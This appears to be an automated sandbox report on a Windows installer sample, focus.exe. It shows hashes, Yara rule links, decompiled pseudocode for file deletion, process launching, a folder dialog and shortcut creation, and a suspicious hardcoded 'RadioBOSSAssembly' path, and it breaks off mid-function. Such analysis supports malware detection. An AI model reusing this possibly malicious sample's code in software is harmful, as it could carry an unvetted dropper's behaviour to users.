Opcode Fuzzy Hash: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
Instruction Fuzzy Hash: C5A011B2000000AFCB02AB00EF08C0ABBA2ABA0300B008838A280800388B320832EB0A

Uniqueness

Uniqueness Score: -1.00%

Function 00401F7B, Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401F7B() {
				void* _t8;
				void* _t12;
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402BCE(_t14);
				E0040521E(0xffffffeb, _t6); // executed
				_t8 = E00405796(_t19); // executed
				_t20 = _t8;
				if(_t20 == _t14) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t14) {
						_t12 = E00406575(_t16, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t14) {
							if(_t12 != _t14) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406055(_t17, _t12);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401f81
0x00401f86
0x00401f8c
0x00401f91
0x00401f95
0x004027bf
0x00401f9b
0x00401f9e
0x00401fa1
0x00401fa9
0x00401fb6
0x00401fb8
0x00401fb8
0x00401fab
0x00401fad
0x00401fad
0x00401fa9
0x00401fbf
0x00401fc0
0x00401fc0
0x00402a5d
0x00402a69

APIs

Part of subcall function 0040521E: lstrlenA.KERNEL32(Completed,00000000,00422E78,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Completed,00000000,00422E78,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00422E78,74B5EA30), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0

Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
Part of subcall function 00406575: GetExitCodeProcess.KERNEL32 ref: 004065A8

Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
Opcode Fuzzy Hash: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403830, Relevance: 1.3, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403830() {
				void* _t1;
				signed int _t6;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
					_t6 =  *0x40a018;
				}
				E00403875();
				return E004058BF(_t6, 0x436800, 7);
			}

0x00403830
0x00403838
0x0040383b
0x00403841
0x00403841
0x00403841
0x00403848
0x00403859

APIs

CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
Instruction ID: 504de9a345f4e041b5d785333e0db00fbf57b3530eebac313f647de5124f4253
Opcode Fuzzy Hash: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
Instruction Fuzzy Hash: D3C01231540704B6D1247F759D4F9093A58AB45736B608775B0F5B00F1D73C8669456D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040460D, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;
				void* _t205;

				_t156 = __edx;
				_t82 =  *0x42a068; // 0x71981c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004057F7(0x3fb, _t146);
					E004063D2(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004057F7(0x3fb, _t146);
							if(E00405B7D(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E004060F7(0x429860, _t146);
							_t87 = E00406500(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004060F7(0x429860, _t146);
								_t89 = E00405B28(0x429860);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429860) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405AD6(0x429860);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429860) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404AA1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebfc; // 0x71a1b4
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A89(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429850);
									} else {
										E004049C4(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040419D(0 | _v8 == _t158);
								if(_v8 == _t158) {
									_t205 =  *0x42a880 - _t158; // 0x0
									if(_t205 == 0) {
										E00404566();
									}
								}
								 *0x42a880 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a890;
							_v60 = E0040495E;
							_v56 = _t146;
							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405A8F(_t146);
								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly") {
									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
										lstrcatA(_t146, 0x42e3c0);
									}
								}
								 *0x42a880 =  *0x42a880 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					} else {
						_a8 = 0x40f;
						goto L12;
					}
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
						E00405A8F(_t146);
					}
					 *0x42ebf8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040417B(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040417B(_t166);
					E004041B0(_t165);
					_t138 = E00406500(8);
					if(_t138 == 0) {
						L53:
						return E004041E2(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x0040460d
0x00404613
0x00404619
0x00404626
0x00404634
0x00404637
0x0040463f
0x00404645
0x00404645
0x00404651
0x00404654
0x004046c2
0x004046c9
0x004047a0
0x004047a7
0x004047b6
0x004047b6
0x004047ba
0x004047c4
0x004047d1
0x004047d3
0x004047d3
0x004047e1
0x004047e8
0x004047ef
0x004047f2
0x00404829
0x0040482b
0x00404831
0x00404836
0x0040483a
0x0040483c
0x0040483c
0x00404858
0x00000000
0x0040485a
0x0040485d
0x0040486b
0x00404871
0x00404872
0x00404875
0x00404878
0x00000000
0x00404878
0x004047f4
0x004047f6
0x004047fa
0x00000000
0x00000000
0x00000000
0x00000000
0x004047fc
0x004047fc
0x00404809
0x0040480e
0x00000000
0x00000000
0x00404812
0x00404814
0x00404814
0x0040481c
0x0040481e
0x00404821
0x00404824
0x00404827
0x00000000
0x00000000
0x00000000
0x00000000
0x00404827
0x00404884
0x0040488e
0x00404891
0x00404894
0x0040489b
0x0040489b
0x0040489d
0x0040489d
0x004048a2
0x004048a4
0x004048ac
0x004048b3
0x004048b5
0x004048c0
0x004048c0
0x004048b5
0x004048c7
0x004048d0
0x004048da
0x004048e2
0x004048fd
0x004048e4
0x004048ed
0x004048ed
0x004048e2
0x00404902
0x00404907
0x0040490c
0x00404915
0x00404915
0x0040491e
0x00404920
0x00404920
0x0040492c
0x00404934
0x00404936
0x0040493c
0x0040493e
0x0040493e
0x0040493c
0x00404943
0x00000000
0x00404943
0x004047f2
0x004047a9
0x004047b0
0x00000000
0x00000000
0x00000000
0x004047b0
0x004046cf
0x004046d8
0x004046f2
0x004046f7
0x00404701
0x00404708
0x00404714
0x00404717
0x0040471a
0x00404721
0x00404729
0x0040472c
0x00404730
0x00404737
0x0040473f
0x00404799
0x00404741
0x00404742
0x00404749
0x00404753
0x0040475b
0x00404768
0x0040477c
0x00404780
0x00404780
0x0040477c
0x00404785
0x00404792
0x00404792
0x0040473f
0x00000000
0x004046f7
0x004046e5
0x00000000
0x004046eb
0x004046eb
0x00000000
0x004046eb
0x00404656
0x00404663
0x0040466c
0x00404679
0x00404679
0x00404680
0x00404686
0x0040468f
0x00404692
0x00404695
0x0040469d
0x004046a0
0x004046a3
0x004046a9
0x004046b0
0x004046b7
0x00404949
0x0040495b
0x004046bd
0x004046c0
0x00000000
0x004046c0
0x004046b7

APIs

GetDlgItem.USER32 ref: 0040465C
SetWindowTextA.USER32(00000000,?), ref: 00404686
SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
CoTaskMemFree.OLE32(00000000), ref: 00404742
lstrcmpiA.KERNEL32(: Completed,Name Setup: Completed,00000000,?,?), ref: 00404774
lstrcatA.KERNEL32(?,: Completed), ref: 00404780
SetDlgItemTextA.USER32 ref: 00404792

Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A

Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\focus.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\focus.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
Part of subcall function 004063D2: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C

GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B

Part of subcall function 004049C4: lstrlenA.KERNEL32(Name Setup: Completed,Name Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D

Strings

A, xrefs: 00404730
C:\Users\user\AppData\Roaming\RadioBOSSAssembly, xrefs: 0040475D
Name Setup: Completed, xrefs: 0040470A, 0040476D
: Completed, xrefs: 0040476E, 00404773, 0040477E

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Roaming\RadioBOSSAssembly$Name Setup: Completed
API String ID: 2624150263-821082612
Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004058BF, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405B7D(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73);
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4c8 =  *0x42f4c8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004060F7(0x42b898, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405AD6(_t73);
					} else {
						lstrcatA(0x42b898, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x42b898,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E004060F7(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405877(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040521E(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4c8 =  *0x42f4c8 + 1;
										} else {
											E0040521E(0xfffffff1, _t73);
											E00405ED6(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004058BF(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b898 - 0x5c;
					if( *0x42b898 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040646B(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405A8F(_t73);
							_t40 = E00405877(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040521E(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040521E(0xfffffff1, _t73);
							return E00405ED6(_t72, _t73, 0);
						}
						L33:
						 *0x42f4c8 =  *0x42f4c8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004058c9
0x004058ce
0x004058d7
0x004058da
0x004058e2
0x004058e5
0x004058e8
0x004058f0
0x004058f2
0x004058f3
0x00000000
0x004058f3
0x004058fe
0x00405901
0x00405901
0x00405901
0x00405905
0x00405918
0x0040591f
0x00405924
0x00405928
0x00405938
0x0040592a
0x00405930
0x00405930
0x0040593d
0x00405940
0x0040594b
0x00405951
0x00405956
0x00405966
0x00405968
0x0040596e
0x00405971
0x00405974
0x00405a2c
0x00405a2c
0x00405a30
0x00405a32
0x00405a32
0x00405a32
0x00405a32
0x00000000
0x00000000
0x00000000
0x00000000
0x0040597a
0x0040597a
0x00405983
0x00405989
0x0040598e
0x00405991
0x00405993
0x00405997
0x00405999
0x00405999
0x00405997
0x0040599c
0x0040599f
0x004059b2
0x004059b4
0x004059b9
0x004059c0
0x004059db
0x004059e0
0x004059e2
0x00405a06
0x004059e4
0x004059e4
0x004059e7
0x004059fb
0x004059e9
0x004059ec
0x004059f4
0x004059f4
0x004059e7
0x004059c2
0x004059c8
0x004059ca
0x004059d0
0x004059d0
0x004059ca
0x00000000
0x004059c0
0x004059a1
0x004059a4
0x004059a6
0x00000000
0x00000000
0x004059a8
0x004059aa
0x00000000
0x00000000
0x004059ac
0x004059b0
0x00000000
0x00000000
0x00000000
0x00405a0b
0x00405a15
0x00405a1b
0x00405a1b
0x00405a26
0x00000000
0x00405a26
0x00405942
0x00405949
0x00000000
0x00000000
0x00000000
0x00405907
0x00405907
0x00405909
0x00405a36
0x00405a38
0x00405a3b
0x00405a8c
0x00405a8c
0x00405a8c
0x00405a3d
0x00405a40
0x00405a4b
0x00405a50
0x00405a52
0x00000000
0x00000000
0x00405a55
0x00405a61
0x00405a66
0x00405a68
0x00000000
0x00405a83
0x00405a6a
0x00405a6d
0x00000000
0x00000000
0x00405a72
0x00000000
0x00405a79
0x00405a42
0x00405a42
0x00000000
0x00405a42
0x0040590f
0x00405912
0x00000000
0x00000000
0x00000000
0x00405912

APIs

DeleteFileA.KERNEL32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
FindFirstFileA.KERNEL32(0042B898,?,?,?,0040A014,?,0042B898,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
FindClose.KERNEL32(00000000), ref: 00405A26

Strings

\*.*, xrefs: 0040592A
C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
"C:\Users\user\Desktop\focus.exe" , xrefs: 004058BF

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\focus.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1753922306
Opcode ID: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
Opcode Fuzzy Hash: 4def77bb891c7b3960c154a2ad73ead010234d10b8a13dea3fc18deabcd134ba
Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040216B() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405AFC( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\AppData\\Roaming\\RadioBOSSAssembly");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
